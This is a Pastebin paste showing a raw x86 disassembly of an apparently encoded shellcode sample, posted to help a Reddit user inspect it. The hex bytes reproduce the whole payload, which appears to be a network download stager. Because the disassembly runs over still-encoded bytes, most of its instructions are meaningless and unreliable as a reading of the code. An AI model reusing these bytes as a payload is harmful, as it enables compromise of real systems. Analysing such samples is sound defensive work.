API tools faq
paste
Advertisement
Guest User

Shellcode decode for /u/wolfblod

a guest
Aug 5th, 2019
507
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.39 KB | None | 0 0
raw download clone embed print report
  1. 0: ea fe 9f 16 16 16 76 jmp 0x7616:0x16169ffe
  2. 7: 9f lahf
  3. 8: f3 27 repz daa
  4. a: c4 72 9d les esi,FWORD PTR [edx-0x63]
  5. d: 44 inc esp
  6. e: 26 9d es popf
  7. 10: 44 inc esp
  8. 11: 1a 9d 44 02 9d 64 sbb bl,BYTE PTR [ebp+0x649d0244]
  9. 17: 3e 19 a1 5c 30 27 e9 sbb DWORD PTR ds:[ecx-0x16d8cfa4],esp
  10. 1e: 27 daa
  11. 1f: d6 (bad)
  12. 20: ba 2a 77 6a 14 mov edx,0x146a772a
  13. 25: 3a 36 cmp dh,BYTE PTR [esi]
  14. 27: d7 xlat BYTE PTR ds:[ebx]
  15. 28: d9 1b fstp DWORD PTR [ebx]
  16. 2a: 17 pop ss
  17. 2b: d1 (bad)
  18. 2c: f4 hlt
  19. 2d: e6 44 out 0x44,al
  20. 2f: 41 inc ecx
  21. 30: 9d popf
  22. 31: 44 inc esp
  23. 32: 06 push es
  24. 33: 9d popf
  25. 34: 54 push esp
  26. 35: 2a 17 sub dl,BYTE PTR [edi]
  27. 37: c6 (bad)
  28. 38: 9d popf
  29. 39: 56 push esi
  30. 3a: 6e outs dx,BYTE PTR ds:[esi]
  31. 3b: 93 xchg ebx,eax
  32. 3c: d6 (bad)
  33. 3d: 62 5c 17 c6 bound ebx,QWORD PTR [edi+edx*1-0x3a]
  34. 41: 46 inc esi
  35. 42: 9d popf
  36. 43: 5e pop esi
  37. 44: 0e push cs
  38. 45: 9d popf
  39. 46: 4e dec esi
  40. 47: 36 17 ss pop ss
  41. 49: c5 f5 2a (bad)
  42. 4c: 5f pop edi
  43. 4d: 9d popf
  44. 4e: 22 9d 17 c0 27 e9 and bl,BYTE PTR [ebp-0x16d83fe9]
  45. 54: 27 daa
  46. 55: d6 (bad)
  47. 56: ba d7 d9 1b 17 mov edx,0x171bd9d7
  48. 5b: d1 2e shr DWORD PTR [esi],1
  49. 5d: f6 63 e2 mul BYTE PTR [ebx-0x1e]
  50. 60: 15 6b ee 2d 6b adc eax,0x6b2dee6b
  51. 65: 32 63 f4 xor ah,BYTE PTR [ebx-0xc]
  52. 68: 4e dec esi
  53. 69: 9d popf
  54. 6a: 4e dec esi
  55. 6b: 32 17 xor dl,BYTE PTR [edi]
  56. 6d: c5 70 9d lds esi,FWORD PTR [eax-0x63]
  57. 70: 1a 5d 9d sbb bl,BYTE PTR [ebp-0x63]
  58. 73: 4e dec esi
  59. 74: 0a 17 or dl,BYTE PTR [edi]
  60. 76: c5 9d 12 9d 17 c6 lds ebx,FWORD PTR [ebp-0x39e862ee]
  61. 7c: 9f lahf
  62. 7d: 52 push edx
  63. 7e: 32 32 xor dh,BYTE PTR [edx]
  64. 80: 4d dec ebp
  65. 81: 4d dec ebp
  66. 82: 77 4f ja 0xd3
  67. 84: 4c dec esp
  68. 85: 47 inc edi
  69. 86: e9 f6 4e 49 4c jmp 0x4c494f81
  70. 8b: 9d popf
  71. 8c: 04 fd add al,0xfd
  72. 8e: 90 nop
  73. 8f: 4b dec ebx
  74. 90: 7e 78 jle 0x10a
  75. 92: 73 62 jae 0xf6
  76. 94: 16 push ss
  77. 95: 7e 61 jle 0xf8
  78. 97: 7f 78 jg 0x111
  79. 99: 7f 42 jg 0xdd
  80. 9b: 7e 5a jle 0xf7
  81. 9d: 61 popa
  82. 9e: 30 11 xor BYTE PTR [ecx],dl
  83. a0: e9 c3 27 e9 41 jmp 0x41e92868
  84. a5: 41 inc ecx
  85. a6: 41 inc ecx
  86. a7: 41 inc ecx
  87. a8: 41 inc ecx
  88. a9: 7e 2c jle 0xd7
  89. ab: 40 inc eax
  90. ac: 6f outs dx,DWORD PTR ds:[esi]
  91. ad: b1 e9 mov cl,0xe9
  92. af: c3 ret
  93. b0: ff 92 16 16 16 4d call DWORD PTR [edx+0x4d161616]
  94. b6: 27 daa
  95. b7: df 47 47 fild WORD PTR [edi+0x47]
  96. ba: 7c 15 jl 0xd1
  97. bc: 47 inc edi
  98. bd: 47 inc edi
  99. be: 7e 46 jle 0x106
  100. c0: 16 push ss
  101. c1: 16 push ss
  102. c2: 16 push ss
  103. c3: 45 inc ebp
  104. c4: 46 inc esi
  105. c5: 7e 41 jle 0x108
  106. c7: 9f lahf
  107. c8: 89 d0 mov eax,edx
  108. ca: e9 c3 fd 66 4d jmp 0x4d66fe92
  109. cf: 27 daa
  110. d0: c4 44 7e 16 les eax,FWORD PTR [esi+edi*2+0x16]
  111. d4: 14 56 adc al,0x56
  112. d6: 92 xchg edx,eax
  113. d7: 44 inc esp
  114. d8: 44 inc esp
  115. d9: 44 inc esp
  116. da: 45 inc ebp
  117. db: 44 inc esp
  118. dc: 46 inc esi
  119. dd: 7e fd jle 0xdc
  120. df: 43 inc ebx
  121. e0: 38 2d e9 c3 9f d0 cmp BYTE PTR ds:0xd09fc3e9,ch
  122. e6: 95 xchg ebp,eax
  123. e7: d5 46 aad 0x46
  124. e9: 27 daa
  125. ea: e9 41 41 7c e9 jmp 0xe97c4230
  126. ef: 45 inc ebp
  127. f0: 40 inc eax
  128. f1: 7e 3b jle 0x12e
  129. f3: 10 0e adc BYTE PTR [esi],cl
  130. f5: 6d ins DWORD PTR es:[edi],dx
  131. f6: e9 c3 93 d6 19 jmp 0x19d694be
  132. fb: 92 xchg edx,eax
  133. fc: d5 17 aad 0x17
  134. fe: 16 push ss
  135. ff: 16 push ss
  136. 100: 27 daa
  137. 101: e9 93 e0 62 12 jmp 0x1262e199
  138. 106: 9f lahf
  139. 107: ef out dx,eax
  140. 108: fd std
  141. 109: 1f pop ds
  142. 10a: 7e bc jle 0xc8
  143. 10c: d3 (bad)
  144. 10d: f4 hlt
  145. 10e: 4b dec ebx
  146. 10f: e9 c3 9f d7 7e jmp 0x7ed7a0d7
  147. 114: 53 push ebx
  148. 115: 37 aaa
  149. 116: 48 dec eax
  150. 117: 27 daa
  151. 118: e9 c3 27 e9 41 jmp 0x41e928e0
  152. 11d: 7c 11 jl 0x130
  153. 11f: 47 inc edi
  154. 120: 40 inc eax
  155. 121: 46 inc esi
  156. 122: 7e a1 jle 0xc5
  157. 124: 41 inc ecx
  158. 125: f6 1d e9 c3 a9 16 neg BYTE PTR ds:0x16a9c3e9
  159. 12b: 39 16 cmp DWORD PTR [esi],edx
  160. 12d: 16 push ss
  161. 12e: 2f das
  162. 12f: d1 62 a1 shl DWORD PTR [edx-0x5f],1
  163. 132: 27 daa
  164. 133: e9 ff 87 17 16 jmp 0x16178937
  165. 138: 16 push ss
  166. 139: ff (bad)
  167. 13a: df 17 fist WORD PTR [edi]
  168. 13c: 16 push ss
  169. 13d: 16 push ss
  170. 13e: fe (bad)
  171. 13f: 9d popf
  172. 140: e9 e9 e9 39 6f jmp 0x6f39eb2e
  173. 145: 24 79 and al,0x79
  174. 147: 54 push esp
  175. 148: 16 push ss
  176. 149: f8 clc
  177. 14a: 67 73 1c addr16 jae 0x169
  178. 14d: 24 39 and al,0x39
  179. 14f: 5b pop ebx
  180. 150: 09 98 8d 86 3d 67 or DWORD PTR [eax+0x673d868d],ebx
  181. 156: ab stos DWORD PTR es:[edi],eax
  182. 157: 5a pop edx
  183. 158: 03 b3 2e 81 d7 23 add esi,DWORD PTR [ebx+0x23d7812e]
  184. 15e: 3f aas
  185. 15f: 7b 01 jnp 0x162
  186. 161: 37 aaa
  187. 162: 6a 1f push 0x1f
  188. 164: 73 95 jae 0xfb
  189. 166: c0 22 3f shl BYTE PTR [edx],0x3f
  190. 169: 8f (bad)
  191. 16a: 9d popf
  192. 16b: 4a dec edx
  193. 16c: 28 ef sub bh,ch
  194. 16e: bd 1d e2 87 cd mov ebp,0xcd87e21d
  195. 173: 9d popf
  196. 174: 4c dec esp
  197. 175: 7f bd jg 0x134
  198. 177: 9c pushf
  199. 178: 65 88 f6 gs mov dh,dh
  200. 17b: ec in al,dx
  201. 17c: de 43 66 fiadd WORD PTR [ebx+0x66]
  202. 17f: bd fb 38 47 c5 mov ebp,0xc54738fb
  203. 184: b5 94 mov ch,0x94
  204. 186: 48 dec eax
  205. 187: b5 9c mov ch,0x9c
  206. 189: c2 f5 92 ret 0x92f5
  207. 18c: 4c dec esp
  208. 18d: 17 pop ss
  209. 18e: b7 e4 mov bh,0xe4
  210. 190: df 54 16 43 fist WORD PTR [esi+edx*1+0x43]
  211. 194: 65 73 64 gs jae 0x1fb
  212. 197: 3b 57 71 cmp edx,DWORD PTR [edi+0x71]
  213. 19a: 73 78 jae 0x214
  214. 19c: 62 2c 36 bound ebp,QWORD PTR [esi+esi*1]
  215. 19f: 5b pop ebx
  216. 1a0: 79 6c jns 0x20e
  217. 1a2: 7f 7a jg 0x21e
  218. 1a4: 7a 77 jp 0x21d
  219. 1a6: 39 23 cmp DWORD PTR [ebx],esp
  220. 1a8: 38 26 cmp BYTE PTR [esi],ah
  221. 1aa: 36 3e 75 79 ss ds jne 0x227
  222. 1ae: 7b 66 jnp 0x216
  223. 1b0: 77 62 ja 0x214
  224. 1b2: 7f 74 jg 0x228
  225. 1b4: 7a 73 jp 0x229
  226. 1b6: 2d 36 5b 45 5f sub eax,0x5f455b36
  227. 1bb: 53 push ebx
  228. 1bc: 36 2f ss das
  229. 1be: 38 26 cmp BYTE PTR [esi],ah
  230. 1c0: 2d 36 41 7f 78 sub eax,0x787f4136
  231. 1c5: 72 79 jb 0x240
  232. 1c7: 61 popa
  233. 1c8: 65 36 58 gs ss pop eax
  234. 1cb: 42 inc edx
  235. 1cc: 36 20 38 and BYTE PTR ss:[eax],bh
  236. 1cf: 26 2d 36 42 64 7f es sub eax,0x7f644236
  237. 1d5: 72 73 jb 0x24a
  238. 1d7: 78 62 js 0x23b
  239. 1d9: 39 23 cmp DWORD PTR [ebx],esp
  240. 1db: 38 26 cmp BYTE PTR [esi],ah
  241. 1dd: 2d 36 54 59 5f sub eax,0x5f595436
  242. 1e2: 53 push ebx
  243. 1e3: 2f das
  244. 1e4: 2d 53 58 43 45 sub eax,0x45435853
  245. 1e9: 5b pop ebx
  246. 1ea: 45 inc ebp
  247. 1eb: 58 pop eax
  248. 1ec: 5f pop edi
  249. 1ed: 46 inc esi
  250. 1ee: 3f aas
  251. 1ef: 1b 1c 16 sbb ebx,DWORD PTR [esi+edx*1]
  252. 1f2: b4 85 mov ah,0x85
  253. 1f4: 54 push esp
  254. 1f5: 63 f2 arpl dx,si
  255. 1f7: f0 dc 9c 39 56 c2 41 lock fcomp QWORD PTR [ecx+edi*1+0x5341c256]
  256. 1fe: 53
  257. 1ff: 1e push ds
  258. 200: 4e dec esi
  259. 201: 4d dec ebp
  260. 202: fe (bad)
  261. 203: 2f das
  262. 204: 80 19 17 sbb BYTE PTR [ecx],0x17
  263. 207: 01 37 add DWORD PTR [edi],esi
  264. 209: f3 e5 08 repz in eax,0x8
  265. 20c: eb 14 jmp 0x222
  266. 20e: af scas eax,DWORD PTR es:[edi]
  267. 20f: 41 inc ecx
  268. 210: 80 78 7f 0f cmp BYTE PTR [eax+0x7f],0xf
  269. 214: c7 86 c6 b9 a1 a6 3e mov DWORD PTR [esi-0x595e463a],0x1375a13e
  270. 21b: a1 75 13
  271. 21e: 1e push ds
  272. 21f: 94 xchg esp,eax
  273. 220: db 2d fb fe 6a 04 fld TBYTE PTR ds:0x46afefb
  274. 226: 1b a4 36 6b b1 a6 d8 sbb esp,DWORD PTR [esi+esi*1-0x27594e95]
  275. 22d: 0a 25 47 5c 2b 5d or ah,BYTE PTR ds:0x5d2b5c47
  276. 233: 48 dec eax
  277. 234: 41 inc ecx
  278. 235: 79 5c jns 0x293
  279. 237: 9f lahf
  280. 238: a5 movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
  281. 239: 43 inc ebx
  282. 23a: 14 f9 adc al,0xf9
  283. 23c: 50 push eax
  284. 23d: 62 8b ad 28 8e 4c bound ecx,QWORD PTR [ebx+0x4c8e28ad]
  285. 243: 6f outs dx,DWORD PTR ds:[esi]
  286. 244: d7 xlat BYTE PTR ds:[ebx]
  287. 245: 41 inc ecx
  288. 246: fd std
  289. 247: 4d dec ebp
  290. 248: 03 29 add ebp,DWORD PTR [ecx]
  291. 24a: 71 58 jno 0x2a4
  292. 24c: b8 83 65 e0 cd mov eax,0xcde06583
  293. 251: 1f pop ds
  294. 252: c7 (bad)
  295. 253: e6 66 out 0x66,al
  296. 255: fe 08 dec BYTE PTR [eax]
  297. 257: 94 xchg esp,eax
  298. 258: 4a dec edx
  299. 259: 97 xchg edi,eax
  300. 25a: 88 a2 df 44 a1 c1 mov BYTE PTR [edx-0x3e5ebb21],ah
  301. 260: 9d popf
  302. 261: fc cld
  303. 262: df 24 3c fbld TBYTE PTR [esp+edi*1]
  304. 265: cb retf
  305. 266: 48 dec eax
  306. 267: 3b 7f 75 cmp edi,DWORD PTR [edi+0x75]
  307. 26a: ae scas al,BYTE PTR es:[edi]
  308. 26b: d9 60 5f fldenv [eax+0x5f]
  309. 26e: ba 96 9c bc e5 mov edx,0xe5bc9c96
  310. 273: 38 24 46 cmp BYTE PTR [esi+eax*2],ah
  311. 276: 39 49 1f cmp DWORD PTR [ecx+0x1f],ecx
  312. 279: dd c6 ffree st(6)
  313. 27b: 9e sahf
  314. 27c: 51 push ecx
  315. 27d: b9 b5 52 f0 82 mov ecx,0x82f052b5
  316. 282: 81 24 46 e7 2d 88 39 and DWORD PTR [esi+eax*2],0x39882de7
  317. 289: df a0 83 85 0e ba fbld TBYTE PTR [eax-0x45f17a7d]
  318. 28f: eb 66 jmp 0x2f7
  319. 291: 88 87 ac f1 67 d1 mov BYTE PTR [edi-0x2e980e54],al
  320. 297: 28 a4 31 8c b8 f2 5e sub BYTE PTR [ecx+esi*1+0x5ef2b88c],ah
  321. 29e: e4 e2 in al,0xe2
  322. 2a0: c9 leave
  323. 2a1: cf iret
  324. 2a2: 24 55 and al,0x55
  325. 2a4: 5b pop ebx
  326. 2a5: bc 90 cb 90 5a mov esp,0x5a90cb90
  327. 2aa: cd 7d int 0x7d
  328. 2ac: 0e push cs
  329. 2ad: 69 6a 48 e2 4f 64 54 imul ebp,DWORD PTR [edx+0x48],0x54644fe2
  330. 2b4: eb 32 jmp 0x2e8
  331. 2b6: 59 pop ecx
  332. 2b7: d7 xlat BYTE PTR ds:[ebx]
  333. 2b8: 3d 44 d3 93 c6 cmp eax,0xc693d344
  334. 2bd: 6a c8 push 0xffffffc8
  335. 2bf: d7 xlat BYTE PTR ds:[ebx]
  336. 2c0: 0e push cs
  337. 2c1: 8d 16 lea edx,[esi]
  338. 2c3: 7e e6 jle 0x2ab
  339. 2c5: a3 b4 40 e9 c3 mov ds:0xc3e940b4,eax
  340. 2ca: 7c 56 jl 0x322
  341. 2cc: 7e 16 jle 0x2e4
  342. 2ce: 06 push es
  343. 2cf: 16 push ss
  344. 2d0: 16 push ss
  345. 2d1: 7e 16 jle 0x2e9
  346. 2d3: 16 push ss
  347. 2d4: 56 push esi
  348. 2d5: 16 push ss
  349. 2d6: 41 inc ecx
  350. 2d7: 7e 4e jle 0x327
  351. 2d9: b2 45 mov dl,0x45
  352. 2db: f3 e9 c3 85 af 16 repz jmp 0x16af88a4
  353. 2e1: 16 push ss
  354. 2e2: 16 push ss
  355. 2e3: 16 push ss
  356. 2e4: 17 pop ss
  357. 2e5: cf iret
  358. 2e6: 47 inc edi
  359. 2e7: 45 inc ebp
  360. 2e8: 9f lahf
  361. 2e9: f1 icebp
  362. 2ea: 41 inc ecx
  363. 2eb: 7e 16 jle 0x303
  364. 2ed: 36 16 ss push ss
  365. 2ef: 16 push ss
  366. 2f0: 45 inc ebp
  367. 2f1: 40 inc eax
  368. 2f2: 7e 04 jle 0x2f8
  369. 2f4: 80 9f f4 e9 c3 93 d6 sbb BYTE PTR [edi-0x6c3c160c],0xd6
  370. 2fb: 62 (bad)
  371. 2fc: d0 9d 11 17 d5 93 rcr BYTE PTR [ebp-0x6c2ae8ef],1
  372. 302: d6 (bad)
  373. 303: 63 f3 arpl bx,si
  374. 305: 4e dec esi
  375. 306: d5 fe aad 0xfe
  376. 308: bf eb e9 e9 24 mov edi,0x24e9e9eb
  377. 30d: 25 38 2e 24 38 and eax,0x38242e38
  378. 312: 27 daa
  379. 313: 24 2e and al,0x2e
  380. 315: 38 24 25 16 16 16 16 cmp BYTE PTR [eiz*1+0x16161616],ah
  381. 31c: 15 .byte 0x15
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!